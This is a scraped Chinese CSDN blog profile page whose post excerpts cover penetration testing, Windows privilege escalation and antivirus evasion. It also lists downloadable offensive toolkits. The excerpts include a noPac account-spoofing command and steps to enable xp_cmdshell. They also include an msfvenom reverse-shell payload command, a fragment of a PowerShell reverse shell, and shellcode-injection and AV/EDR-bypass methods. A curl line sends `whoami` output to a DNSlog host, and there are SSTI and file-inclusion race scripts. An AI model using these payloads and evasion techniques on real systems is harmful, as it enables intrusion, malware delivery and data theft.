自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(171)
  • 收藏
  • 关注

原创 WEB渗透Win提权篇-AccountSpoofing

https://github.com/cube0x0/noPac>noPac.exe scan -domain htb.local -user user -pass 'password123'>noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt>noPac.exe -

2024-08-25 20:36:43 116

原创 WEB渗透Win提权篇-MYSQL-udf

Mysql>5.1 udf.dll放置在lib\plugin Mysql

2024-08-25 16:58:47 72

原创 WEB渗透Win提权篇-MSSQL

查询状态>select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 存在返回1EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;exec sp_configure 'xp_cmdshell',1;reconfigure;exec maste

2024-08-24 01:07:15 104

原创 WEB渗透Win提权篇-RDP&Firewall

放行出去到远程8888端口的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=out remoteport=8888 action=allow。放行远程8888端口进来的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=in remoteport=8888 action=allow。本机开启3389远程连接的方法。注: 修改连接端口重启后生效。

2024-08-24 01:05:52 329

原创 WEB渗透免杀篇-绕过

在进程中分配空间(检索内存地址)。我们可以使用几个Win32 API执行这些步骤: OpenProcess() VirtualAllocEx() WriteProcessMemory() CreateRemoteThread() 正常情况下,我们将原始shellcode直接写入到内存中,但是如果AV /EDR检测到了Shellcode,它们肯定会发出警报 所以我们在二进制文件中使用可逆的方式把shellcode编码,再解码写入内存来规避防护。现在,我们将开始实现将为我们执行shellcode注入的C代码。

2024-08-22 21:07:34 548

原创 Windows-Server-2016/2019绕过WindowsDefender

该代码利用golang中的syscall包来调用NewLazyDLL 方法来加载Kernel32.dll,加载Kernel32.dll后,即可将其用于寻址和内存分配。由于代码存在许久,可能直接使用会被检测到,这里对其进行了修改,重命名所有变量,通过URL方式加载shellcode,为了绕过沙盒,添加了一些其他的参数,如果不存在参数则退出执行。Windows Server 2016和2019上的Microsoft Defender Antivirus自动将您注册为某些排除项,具体由您指定的服务器角色定义。

2024-08-22 21:00:32 384

原创 WEB渗透免杀篇-cshot远程shellcode

C_Shot是一种用C语言编写的攻击性安全工具,旨在通过HTTP / HTTPS下载远程shellcode二进制文件(.bin),注入并执行shellcode。1.shellcode注入其自己的进程 2.使用父进程欺骗将shellcode注入子进程 使用C_Shot之类的工具的好处是,我们要执行的恶意代码没有存储在二进制文件中,而是从远程位置检索,读入内存然后执行。对于本文中的所有示例,我将使用github托管shellcode。分阶段和无阶段的shellcode在使用欺骗父进程方法时都可以绕过av。

2024-08-21 14:00:16 243

原创 WEB渗透免杀篇-MSF免杀

msf生成图片格式>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f faw -o /root/1.png生成解决方案即可。#define _CRT_SECURE_NO_WARNINGS#include #include #include int main(void){ FILE* fp; size_t size;

2024-08-21 13:56:09 206

原创 WEB渗透免杀篇-Pezor免杀

使用inline_syscall内联注入shellcode,结合sgn,donut等项目,增加了一些反调试技巧。–h 这里测试下mimikatz,-sleep设置为2分钟,执行后需等两分钟 打包之前。

2024-08-20 16:59:47 219

原创 WEB渗透免杀篇-Golang免杀

参数解释: garble(混淆库): -tiny 删除额外信息 -literals 混淆文字 -seed=random base64编码的随机种子 go: -w 去掉调试信息,不能gdb调试了 -s 去掉符号表 -H windowsgui 隐藏执行窗口,不占用 cmd 终端。复制到aes-sc.go中的51行替换payload 运行aes-sc.go生成AES加密后的值。复制输出的值到go-sc.go中的73行替换payload 编译成exe可执行程序。

2024-08-20 16:57:32 688 1

原创 WEB渗透免杀篇-Bypass-AMSI

$stream = $client.GetStream()[byte[]]$bytes = 0..65535|%{0}$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserv

2024-08-19 18:23:31 251

原创 WEB渗透免杀篇-免杀工具全集

重写免杀版Gh0st远控、大灰狼远控免杀,目前可免杀360、火绒、腾讯电脑管家等主流杀软。

2024-08-19 18:21:25 2189

原创 WEB渗透免杀篇-MSF+shellcode免杀

目前过火绒,不过360,可组合一下 Vs新建c++控制台程序 右键属性-》将MFC的使用选为在静态库中使用MFC 生成c格式shellcode粘贴进remote inject.cpp。生成的py文件使用py2exe编译执行 生成的cs文件使用csc.exe编译执行 生成的cpp文件使用vc6.0编译,去掉预编译头编译执行。正常执行结束进程msbuild会失去会话,以下保存bat执行 获得session后立刻迁移进程。生成项目 能成功上线,并开启calc进程。当前过不了火绒,360动态静态可过。

2024-08-16 11:57:35 394

原创 WEB渗透免杀篇-加载器免杀

MSF监听 可使用minGW自行编译。生成payload(raw)生成payload(c)

2024-08-16 11:50:47 235

原创 WEB渗透免杀篇-分块免杀

przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location)) 变为 magic="Syst"+"em"+".dll";[DllImport("kernel32.dll")] 变为 [DllImport("ke"+"rne"+"l32.dll")] #可绕过赛门铁克。因为我没加汇编指令,中间这里直接按任意键跳过即可,懂的可以在开头添加一些指令,例如xor,inc,dec,add,sub,mov,nop等。

2024-08-15 08:52:32 330

原创 WEB渗透免杀篇-Powershell免杀

再混淆一下函数和变量 绕过执行命令的拦截 使用cs的参数欺骗。Powershell行为检测bypass。对函数,参数,变量进行混淆。

2024-08-15 08:47:21 304

原创 WEB渗透免杀篇-Python源码免杀

粘贴shellcode到shellcode+py.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe。粘贴shellcode到shellcode+c.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe。会在目录下生成dist文件夹,exe文件就在里面。会在目录下生成dist文件夹,exe文件就在里面。

2024-08-14 14:26:34 400

原创 WEB渗透免杀篇-C#源码免杀

Payload粘贴到InstallUtil-Shellcode.cs中使用csc编译。生成payload MSF监听需设置自动迁移进程。生成payload MSF监听需设置自动迁移进程。生成payload MSF监听需设置自动迁移进程。MSF启动监听 Payload粘贴到位置。粘贴payload后编译加密。与上文xor加密类似。

2024-08-14 14:19:06 246

原创 WEB渗透-钓鱼邮件

假冒的内部域名假冒的外部域名近似域名被黑账户群发/特定发虚构情景/恶意连接/恶意文件

2024-08-13 08:52:38 249

原创 WEB渗透-MySQL渗透破局

客户端必须启用LOCAL-INFILE 客户端支持非SSL连接 目标web存在adminer等可检查数据库连接的脚本。攻击机本地运行python构造假mysql服务,使用目标web连接,读取文件。使用“use mysql”命令,选择要使用的数据库,修改远程连接的基本信息,保存在mysql数据库中,因此使用mysql数据库。使用“mysql -uroot -proot”命令可以连接到本地的mysql服务。”命令刷新刚才修改的权限,使其生效。命令可以更改远程连接的设置。不登录直接执行sql。

2024-08-13 08:44:29 349

原创 WEB渗透-TomcatAjp之LFI&RCE

配合目标文件上传传入服务器。

2024-08-12 14:28:03 424

原创 WEB渗透-近源攻击合集

# 钓鱼网络## Hostapd```text>apt install hostapd dnsmasq>cd /etc/hostapd```创建无加密热点```text>vim open.conf ```修改以下内容```textInterface=wlan1Ssid=FreeWIFIDriver=nl80211Channel=1Hw_mode=g```修改dns配置```text>vim /etc/dnsmasq.conf``````tex

2024-08-12 14:26:24 1646

原创 WEB渗透Bypass篇-常规操作

01利用LD_PRELOAD环境变量 02利用ShellShock(CVE-2014-6271) 03利用Apache Mod CGI 04 PHP-FPM利用LD_PRELOAD环境变量(同1) 05攻击PHP-FPM监听端口 06 Json Serializer UAF 07具有特定析构函数UAF的PHP7 GC。或 替换php文件中的mail为error_log("a",1);phpinfo中搜索server api是cgi或者fastcgi 如果是cgi模式:上传如下htaccess。

2024-08-10 22:34:20 240

原创 WEB渗透Bypass篇-ImageMagick组件绕过

【代码】WEB渗透Bypass篇-ImageMagick组件绕过。

2024-08-10 22:26:03 117

原创 WEB渗透Bypass篇-常规函数绕过

------------------------------------------------------------------------------------------------------------------------------------------------------------------

2024-08-09 22:35:33 358

原创 WEB渗透-未授权访问篇

solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等。J2EE应用服务器,默认端口7001 访问URL,直接打开后台页面。默认端口8161,默认账户密码admin/admin。Shipyard默认密码 admin/shipyard。开源数据库,默认端口5984,SSL端口6984。默认端口2181 获得服务器环境信息。

2024-08-09 22:32:10 318

原创 WEB渗透未授权访问篇-Redis

-rhost=目标IP --rport=6379 --lhost=本机IP --lport=本地端口 --rpath="在目标保存的路径" --rfile="在目标保存的文件" --lfile="本地文件" --auth=redis密码。Web目录写入木马 启动项 系统DLL劫持(目标重启或注销) 特定软件的DLL劫持 覆盖快捷方式 覆盖配置文件 覆盖sethc等文件。修改redis_lua.py里的 host 为目标 IP 执行返回正常,反弹shell。

2024-08-08 19:59:48 451

原创 WEB渗透Web突破篇-编辑器漏洞

影响版本: 较早版本 脆弱描述:通过自定义Type变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。攻击利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp 打开这个地址就可以上传任何类型的文件了,Shell上传到的默认位置是:XXXX。

2024-08-08 19:22:03 685

原创 Web-server日志分析命令

awk '$0 ~ /[error]/ && match($0, /(client: )(.*)(, server)/, arr) {print arr[2]}' /var/log/apache2/error.log | sort | uniq -c | sort -rn | awk -v OFS='\t' '{"host " $2 | getline ip; print $0, ip}'

2024-08-07 10:49:59 364

原创 WEB渗透Web突破篇-目录爆破

|工具名称||cansina||Cewl||dirsearch||dirsearch_bypass403||dirb||dirmap||dontgo403||feroxbuster||ffuf||gobuster||gau||gospider||ihoneyBakFileScan_Modify||jsluice||katana||spray||urlfounder||urlbrute||URLFinder||waybackurls||wfuzz|

2024-08-07 10:49:08 510

原创 WEB渗透Web突破篇-SQL注入进阶

greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值 id=1 and greatest(ascii(substr(database(),0,1)),64)=64。mid(version() from 1 for 1)相当于Mid(version(),1,1)%a 换行符,可结合注释符使用%23%0a,%2d%2d%0a。/ 1,user() //数字范围 1000-50540。相当于 union select 1,2,3,4,5。/、--[空格] ...

2024-08-06 12:53:27 590

原创 WEB渗透Web突破篇-命令执行

>curl http://0ox095.ceye.io/`whoami`>ping `whoami`.b182oj.ceye.io>ping %CD%.lfofz7.dnslog.cn &cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.ceye.io

2024-08-06 12:34:53 219

原创 WEB渗透Web突破篇-WAF绕过

​上传php3,php4,phtml等**文件名后加::DATA∗∗ConTent−Disposition:form−data;name="filepath";filename="1.asp::DATA** ConTent-Disposition: form-data; name="filepath"; filename="1.asp::DATA∗∗ConTent−Disposition:form−data;name="filepath";filename="1.asp::DATA" ConTent-

2024-08-05 14:19:13 2390

原创 WEB渗透Web突破篇-PHP漏洞利用

php:5.2.17 5.4.45GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding:gzip,deflateAccept-Chars

2024-08-05 14:04:15 233

原创 WEB渗透Web突破篇-PHPMyAdmin利用

phpMyAdmin 2.xPOST /scripts/setup.php HTTP/1.1Host: ip:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application

2024-08-04 12:58:26 91

原创 WEB渗透Web突破篇-命令注入

【代码】WEB渗透Web突破篇-命令注入。

2024-08-04 12:56:53 93

原创 WEB渗透Web突破篇-SSTI

${1+1}#{1+1}不包括代码执行// DNS Lookup${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}// JVM 系统属性查找 (ex: java.class.path)${"".getClass().forName("java.lang.System").getD

2024-08-04 12:32:42 172

原创 WEB渗透Web突破篇-Xpath注入

https://github.com/orf/xcathttps://github.com/feakk/xxxpwnhttps://github.com/aayla-secura/xxxpwn_smarthttps://github.com/micsoftvn/xpath-blind-explorerhttps://github.com/Harshal35/XMLCHOR

2024-08-03 20:33:48 107

原创 WEB渗透Web突破篇-SSRF

转码服务在线翻译获取超链接的标题等内容进行显示请求远程服务器资源的地方,图片加载与下载(通过URL地址加载或下载图片)图片、文章收藏功能对外发起网络请求的地方,网站采集、网页抓取的地方。头像 (远程加载头像)一切要你输入网址的地方和可以输入ip的地方。数据库内置功能(mongodb的copyDatabase函数)邮件系统文件处理在线处理工具从URL关键字中寻找:share、wap、url、link、src、source、target、u、3g、display、sourceURl、im

2024-08-03 20:32:29 1114

原创 WEB渗透Web突破篇-PHP文件包含下载读取

import itertoolsimport requestsimport sysprint('[+] Trying to win the race')f = {'file': open('shell.php', 'rb')}for _ in range(4096 * 4096): requests.post('http://target.com/index.php?c=index.php', f)print('[+] Bruteforcing the inclusion')fo

2024-08-02 14:14:12 338

网络安全之渗透测试20w字全套笔记

前50章目录: 收集信息 域名信息 CDN是否存在 Bypass CDN DNS历史记录 SSL证书信息 Whois信息 子域名检查 IP和端口信息 ASN 历史IP NMAP使用 工具 网站架构和指纹识别 其他信息 人员信息 初始访问 Web服务突破 前端 SQL注入 判断注入 数据库类型识别 MSSQL MYSQL Oracle PostgreSQL SQLite DB2 SQLMAP XSS CSRF PHP包含下载读取 XML SSRF DNSLOG Xpath注入 SSTI 命令注入 PHPMyAdmin利用 PHP-FPM之RCE PHPstudy后门 IIS写权限 绕过WAF 数据库 命令执行 CmdHijack Fuzz目录 web程序漏洞 编辑器漏洞 邮件地址payload 从LFI到RCE Web server日志分析命令 默认密码 wso2 未授权访问 Redis activemq docker elastic hadoop jboss jenkins memcache mongo zookeeper CouchDB Jenkins Solr VNC Webl

2024-08-25

蓝桥杯等程序设计竞赛专题挑战教程

《程序设计竞赛专题挑战教程》pdf电子书可在码农书籍网下载,这本书针对蓝桥杯软件类大赛,覆盖了数据结构和算法等关键知识点,并提供了详细的在线评测系统介绍和评分说明。书籍内容包括从基础到高级的各类知识点,如手算题、基础数据结构、基本算法等,并用真题进行细致讲解,适合备赛蓝桥杯或其他编程、算法类大赛 本资源为相应的代码资源。

2024-08-25

蓝桥杯LeeCode数据结构与算法资源

关于LeetCode数据结构与算法的学习资源,以下是一些推荐的资源,这些资源涵盖了从基础到高级的算法知识,包括在线教程、开源项目、视频课程等多种形式: LeetCode官方题库:LeetCode平台本身提供了大量的算法题目,是学习数据结构和算法的重要资源。 LeetCode Official 程序员充电站/LeetCode-Py:提供了详细的算法与数据结构基础讲解教程,包括850+道LeetCode题目的详细解析。 GitHub - itcharge/LeetCode-Py LeetCode 算法笔记:由DataWhale开源组织提供,适合希望通过理论与实践相结合的方式学习算法的人。 LeetCode 算法笔记 清华大佬LeetCode教程:B站上的视频教程,由清华大学学生讲解,包括解题思路、代码讲解和刷题笔记。 Bilibili - 清华大佬LeetCode教程 算法通关手册:一本算法与数据结构的电子书,适合希望通过系统学习掌握算法知

2024-08-25

全套免杀教程+免杀工具合集

远控免杀专题(1)-基础篇.pdf 远控免杀专题(2)-msfvenom隐藏的参数.pdf 远控免杀专题(3)-msf自带免杀(VT免杀率35-69).pdf 元控免杀专题(4)-Evasion模块免杀(VT免杀率12-71).pdf 远控免杀专题(5)-Veil免杀(VT免杀率23-71).pdf 远控免杀专题(6)-Venom免杀(VT免杀率11-71).pdf 远控免杀专题(7)-Shellter免杀(VT免杀率7-69).pdf 元控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13-71).pdf 远控免杀专题(9)-Avet免杀(VT免杀率17-71).pdf 远控免杀专题(10)-TheFatRat免杀(VT免杀率22-70).pdf 元控免杀专题(11)-Avoidz免杀(VT免杀率23-71).pdf 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23-70).pdf 远控免杀专题(13)-zirikatu免杀(VT免杀率39-71).pdf 远控免杀专题(14)-AVlator免杀.pdf 等共74课+48个工具脚本

2024-08-25

CTF线下赛AWD脚本合集

资源概述: 本人在长城杯、蓝桥杯、巅峰极客等线下AWD攻防比赛所用到的全部工具(如WAF、EDR、文件监控脚本、文件还原脚本、混淆战局工具、流量监控工具、批量拿分脚本模板)和脚本以及教程及笔记还有练习平台和靶场源码,并取得了很多奖项,故在此分享这些资源,希望有需要的人能得到帮助。 目录: 文件变化实时监控工具 go文件监控 CTF-WAF AWD脚本 awd_attack_framework 批量拿分脚本 搅屎棍脚本 文件还原脚本 笔记x8 前期准备教程 不死马x6 AWD训练平台源码 AWD靶场合集 大型WAF源码 漏洞识别工具

2024-08-25

渗透测试常用poc、工具集合

本poc包含近100多个常用的poc,还有很多工具集。全是博主自己用的,现在免费分享,下面是列举的前10个poc: CVE-2019-0708-msf快速搭建 CVE-2019-10173 Xstream 1.4.10版本远程代码执行漏洞 CVE-2019-16131 OKLite v1.2.25任意文件上传漏洞 CVE-2019-16132 OKLite v1.2.25存在任意文件删除漏洞 CVE-2019-16309 FlameCMS 3.3.5后台登录处存在sql注入漏洞] CVE-2019-16313蜂网互联企业级路由器v4.31密码泄露漏洞 CVE-2019-16314 indexhibit cms v2.1.5存在重装并导致getshell CVE-2019-16759 vBulletin 5.x Oday pre-auth RCE exploit

2024-01-06

护网面试题总结+安全工程师笔试问题

博主的团队面试护网的时候遇到的所有问题,希望能帮助到每个护网梦的网安生。 护网行动」是以「公安部牵头」的,用以评估企事业单位的网络安全的活动。具体实践中,公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。 当前,我国网络安全形势严峻,「为了防止羊被偷,我们得在羊被偷之前就开始识别风险、加固羊圈建设」。护网行动就是在这样的背景下开展的。 护网行动每年举办一次,政府单位、事业单位、国企单位、名企单位等都必须参与! 「护网行动」是国家应对网络安全问题所做的重要布局之一。“护网行动”从2016年开始,随着我国对网络安全的重视,涉及单位不断扩大,越来越多的单位都加入到护网行动中,网络安全对抗演练越来越贴近实际情况,各机构对待网络安全需求也从被动构建,升级为业务保障刚需。

2024-01-06

网络安全零基础学习路线 v2024

一个实习过安服、渗透测试工程师的大学毕业生,挖过SRC中级,打过CTF获得过国奖,去过护网蓝中和红初,通过7家培训班+自生经验总结的2024最全最新的网络空间安全路线图,小白可以按这个路线入门,自学的小伙伴也可以靠这个查漏补缺,我也是自学出生到现在这个程度的,相信自己,多学多刷题,你也可以实现4k日薪梦。后续资料还在整理中,可以看看我分享的其他资料,免费公开,助力每一个红客梦

2024-01-06

SRC技术文档汇总100套(2024最新版)

本人自发整理了一个月,将2024以前的全部SRC技术资料全部系统性整理到一起,供技术学习使用,本人初学三个月已成功挖了一个CNTD中级漏洞,希望对大家有帮助。 安全应急响应中心(SRC, Security Response Center) ,是企业用于对外接收来自用户发现并报告的产品安全漏洞的站点。第三方报告平台。报告平台是指由独立的第三方公司成立的综合性的报告平台。国内补天平台、盒子平台、火线平台等均属于该模式。外部报告者注册对应漏洞报告平台,选择对应的厂商进行报送,接着该第三方机构会发送邮件提示相关厂商确认处理。 企业SRC。企业自己开发自己的安全应急响应中心,制定自己的漏洞收集以及奖金计划。目前国内已有近百家企业SRC平台,例如百度、阿里、腾讯、美团、滴滴等,均成立了自己的安全应急响应中心,对外收集并处理白帽子报送的报告。

2024-01-06

CISP、NISP二级、CISE题库最新版(2024年1月更新)

CISP、NISP二级、CISE是用的同一套试卷,本人自考NISP二级12月份场次已过,免费把自己备考刷的题库分享出来,考NISP二级在考前把这些题库刷两遍基本上就过了,我是一把过的,重点是认真刷题,考试的时候全部是原题

2024-01-06

NISP一级题库,NISP二级题库,国家信息安全水平测试,网络安全证书(2024)

个人在报考的NISP官网通过爬虫获取的全部题目,自用。需要的自取,2024年1月最新更新,NISP一级题库,复兴杯初赛题库。

2024-01-06

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除